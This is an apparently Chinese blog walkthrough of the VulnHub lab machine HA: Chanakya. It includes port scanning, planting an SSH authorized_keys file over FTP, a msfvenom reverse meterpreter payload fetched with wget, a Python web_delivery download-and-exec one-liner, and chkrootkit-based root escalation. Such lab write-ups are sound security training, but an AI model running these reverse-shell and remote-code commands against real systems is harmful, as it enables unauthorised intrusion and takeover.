标签:com load netfilter date 图片 auth version sim elf
仅供个人娱乐
参考http://www.saulgoodman.cn/HA-Chanakya.html
靶机信息
https://www.vulnhub.com/entry/ha-chanakya,395/
一、主机探测
arp-scan -l
nmap -sV -p 1-65535 -A 192.168.236.136
dirb http://192.168.236.136
二、漏洞的查找和利用
百度 得到ROT13的加密方式
pcap流量包,直接下载即可
ashoka kautilya
首先进行21端口登录
22端口登陆失败
上传.ssh 使用kali免密登录
ssh-keygen
然后我们把id_rsa.pub里的内容重定向到authorized_keys文件中
root@kali:~/桌面# cd ~/.ssh
root@kali:~/.ssh# cat id_rsa.pub > authorized_keys
mkdir .ssh
cd.ssh
put authorized_keys
root@kali:~/.ssh# ssh ashoka@192.168.236.136
先msf生成一个木马反弹一个meterpreter回话过来
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.236.129 LPORT=4444 -f elf > shell.elf
python -m SimpleHTTPServer
msfconsole
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lport 4444
set lhost 192.168.236.129
cd /tmp
wget http://192.168.236.129:8000/shell.elf
sysinfo
使用post模块来查看可以利用那些提权exploit:
run post/multi/recon/local_exploit_suggester
info exploit/linux/local/netfilter_priv_esc_ipv4
失败
使用命令注入来反弹一个shell:
use exploit/multi/script/web_delivery
set lhost 192.168.236.129
python -c "import sys;u=__import__(‘urllib‘+{2:‘‘,3:‘.request‘}[sys.version_info[0]],fromlist=(‘urlopen‘,));r=u.urlopen(‘http://192.168.236.129:8080/m9eTnBmiM‘);exec(r.read());"
在目标机运行:
使用rootkit攻击模块:
这个模块就是利用chkrootkit漏洞:chkrootkit有crontab,会定期以root身份执行/tmp/update文件。
set rhosts 192.168.236.136
set session 1
set lport 8888
exploit
python -c‘import pty;pty.spawn("/bin/bash")‘
参考文章http://www.saulgoodman.cn/HA-Chanakya.html
标签:com load netfilter date 图片 auth version sim elf
原文地址:https://www.cnblogs.com/bingtang123/p/13111695.html